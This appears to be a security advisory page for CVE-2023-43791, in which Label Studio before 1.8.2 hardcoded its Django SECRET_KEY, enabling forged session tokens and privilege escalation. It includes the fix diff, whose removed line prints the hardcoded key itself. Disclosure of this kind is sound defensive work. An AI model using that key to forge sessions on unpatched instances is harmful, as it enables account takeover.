VYPR
← All advisories
Critical severityNVD Advisory· Published Nov 9, 2023· Updated Sep 3, 2024

Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens

CVE-2023-43791

Description

Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before 1.8.2, where a patch was introduced.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
label-studioPyPI
< 1.8.21.8.2

Affected products

1

Patches

1
3d06c5131c15

fix: LSDV-5071: Ensure secret key is securely set persisting a new one if required (#4690)

https://github.com/HumanSignal/label-studiobmartelAug 28, 2023via ghsa
commit
4 files changed · +29 2
  • deploy/requirements.txt+1 0 modified
    @@ -25,6 +25,7 @@ Django==3.2.20
 django-storages==1.12.3
 django_annoying==0.10.6
 django_debug_toolbar==3.2.1
+django-environ==0.10.0
 django_filter==2.4.0
 django_model_utils==4.1.1
 django_rq==2.5.1
  • label_studio/core/settings/base.py+2 2 modified
    @@ -74,7 +74,7 @@
 if not logging.getLogger().hasHandlers():
     logging.basicConfig(level=logging.DEBUG, format='%(message)s')
 
-from label_studio.core.utils.io import get_data_dir
+from label_studio.core.utils.io import get_data_dir, generate_key_if_missing
 from label_studio.core.utils.params import get_bool_env, get_env, get_env_list_int
 
 logger = logging.getLogger(__name__)
@@ -105,7 +105,7 @@
 INTERNAL_PORT = '8080'
 
 # SECURITY WARNING: keep the secret key used in production secret!
-SECRET_KEY = '$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n'
+SECRET_KEY = generate_key_if_missing('SECRET_KEY')
 
 # SECURITY WARNING: don't run with debug turned on in production!
 DEBUG = get_bool_env('DEBUG', True)
  • label_studio/core/utils/io.py+19 0 modified
    @@ -1,4 +1,5 @@
 """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
+
 """
 import os
 import socket
@@ -16,6 +17,8 @@
 from tempfile import mkstemp, mkdtemp
 
 from django.conf import settings
+from django.core.management.utils import get_random_secret_key
+from label_studio.core.utils.params import env, env_file
 from appdirs import user_config_dir, user_data_dir, user_cache_dir
 
 # full path import results in unit test failures
@@ -208,3 +211,19 @@ def validate_upload_url(url, block_local_urls=True):
         if ipaddress.ip_address(ip) in ipaddress.ip_network(subnet):
             raise InvalidUploadUrlError
 
+def generate_key_if_missing(key):
+    value = env.str(key, "")
+
+    if value == "":
+        print(f'Warning: {key} not found in environment variables will generate a random key.')
+        value = get_random_secret_key()
+        try:
+            with open(env_file, 'a') as f:
+                f.write(f'\n{key}={value}\n')
+        except Exception as e:
+            print(f'Warning: failed to write {key} to .env file: {e}, new key will be regenerated on every server restart. If this key is used for signing, it will invalidate all existing sessions or tokens. Please set {key} in your environment variables to avoid this warning.')
+
+        os.environ[key] = value
+
+    return value
+
  • label_studio/core/utils/params.py+7 0 modified
    @@ -1,7 +1,14 @@
 import os
+import environ
+
 from rest_framework.exceptions import ValidationError
 
 
+env = environ.Env()
+data_dir = os.environ.get('LABEL_STUDIO_DATA_DIR', os.path.join(os.path.dirname(__file__), '..', '..', '..', 'data'))
+env_file = os.path.join(data_dir, '.env')
+environ.Env.read_env(env_file)
+
 def cast_bool_from_str(value):
     if isinstance(value, str):
         if value.lower() in ['true', 'yes', 'on', '1']:

Vulnerability mechanics

Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

7

News mentions

0

No linked articles in our index yet.